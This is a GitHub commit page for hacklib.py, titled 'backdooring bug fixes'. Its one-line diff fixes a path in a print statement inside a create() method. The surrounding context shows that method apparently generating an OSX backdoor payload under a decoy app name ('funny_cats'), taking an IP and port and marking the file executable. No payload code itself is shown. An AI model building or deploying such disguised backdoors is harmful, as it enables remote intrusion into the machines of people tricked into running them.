Skip to content

Commit 1aaf1a4

Browse files
committed
backdooring bug fixes
1 parent 4b09fd5 commit 1aaf1a4

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

hacklib.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -69,7 +69,7 @@ def create(self, IP, port, OS, appname = 'funny_cats'):
6969
f.write(self.osx_payload)
7070
import subprocess
7171
subprocess.Popen(['chmod', '755', payload_path])
72-
print 'Payload saved to ' + os.getcwd() + appname + '.app'
72+
print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app'
7373

7474
class Server(object):
7575

0 commit comments

Comments
 (0)